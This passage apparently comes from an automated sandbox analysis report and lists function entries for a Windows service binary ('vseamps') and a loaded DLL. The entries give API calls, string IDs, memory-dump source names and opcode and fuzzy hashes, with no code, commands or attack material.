                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcesslstrlen
                                                                              • String ID:
                                                                              • API String ID: 3424473247-0
                                                                              • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                              • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                              • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                              • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                              Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                              • String ID: bad exception$csm$csm$csm
                                                                              • API String ID: 3766904988-820278400
                                                                              • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                              • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                              • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                              • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                              Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                              • String ID:
                                                                              • API String ID: 2707001247-0
                                                                              • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                              • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                              • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                              • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                              Function 00007FFE1A524804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 849930591-393685449
                                                                              • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                              • Instruction ID: 587515e885a66304fb8a4f04e0bf6ffd687003647ba4ab7ca66e7b04576a8f2d
                                                                              • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                              • Instruction Fuzzy Hash: 12D15F62B0CB41C6EB109BA694403BD7BB1FB46BA8F1041B7EA4D57B66CF38E495C700
                                                                              Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                              • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                              • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                              • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                              Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                              • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                              • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                              • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                              Function 00007FFE1A52B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeLibraryProc
                                                                              • String ID: api-ms-$ext-ms-
                                                                              • API String ID: 3013587201-537541572
                                                                              • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                              • Instruction ID: def557fef170f9c471f5aadf7b0a5d38f428c88074dc9b5010b685b225645b19
                                                                              • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                              • Instruction Fuzzy Hash: AF41E262B1DE0291EA168B57A8106BA2396BF46FB0F0A45B7DD0E477A4EF3CE445C300
                                                                              Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                              • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                              • API String ID: 1119674940-1966266597
                                                                              • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                              • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                              • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                              • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                              Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                              • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                              • API String ID: 3702919091-996641649
                                                                              • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                              • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                              • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                              • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                              Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                              • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$Info
                                                                              • String ID:
                                                                              • API String ID: 1775632426-0
                                                                              • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                              • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                              • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                              • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                              Function 00007FFE1A52712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5272EB,?,?,?,00007FFE1A523EC0,?,?,?,?,00007FFE1A523CFD), ref: 00007FFE1A5271B1
                                                                              • GetLastError.KERNEL32(?,?,?,00007FFE1A5272EB,?,?,?,00007FFE1A523EC0,?,?,?,?,00007FFE1A523CFD), ref: 00007FFE1A5271BF
                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5272EB,?,?,?,00007FFE1A523EC0,?,?,?,?,00007FFE1A523CFD), ref: 00007FFE1A5271E9
                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FFE1A5272EB,?,?,?,00007FFE1A523EC0,?,?,?,?,00007FFE1A523CFD), ref: 00007FFE1A527257
                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FFE1A5272EB,?,?,?,00007FFE1A523EC0,?,?,?,?,00007FFE1A523CFD), ref: 00007FFE1A527263
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                              • String ID: api-ms-
                                                                              • API String ID: 2559590344-2084034818
                                                                              • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                              • Instruction ID: e9c2067340d38dfffc6a4d8dffa6020fc1a385bfdf0ac849e3cc1d9a11a6ac2c
                                                                              • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                              • Instruction Fuzzy Hash: F1318121B1EE42D1FE16DB97A4005B96296BF4AFB0F5906B7ED1D067A0EF3CE445C200
                                                                              Function 00007FFE1A529444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Value$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 2506987500-0
                                                                              • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                              • Instruction ID: 1c53399f5bd49a80ced011177b584d8f63c119a321399849bca5d0c58631b32f
                                                                              • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                              • Instruction Fuzzy Hash: 8C214F20B0CE43CAF65563A3555113961636F86FF0F544BF7E92E467F6EE2CA4418280
                                                                              Function 00007FFE1A530100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                              • String ID: CONOUT$
                                                                              • API String ID: 3230265001-3130406586
                                                                              • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                              • Instruction ID: 94e7029c07210f593da57ad16ada1141d8c18cde67f0cd268e0c4e9ea47cda09
                                                                              • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                              • Instruction Fuzzy Hash: 53115922B1CF4182E7508B57A84433962A0AF99FF4F0042B6EA5E87BA4DF3CD558C744
                                                                              Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                              • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                                • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                              • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                              • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                                • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                              • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                              • String ID: vseamps
                                                                              • API String ID: 3197017603-3944098904
                                                                              • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                              • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                              • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                              • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                              Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Messagesprintf_s
                                                                              • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                              • API String ID: 2642950106-3610746849
                                                                              • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                              • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                              • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                              • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                              Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                              • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
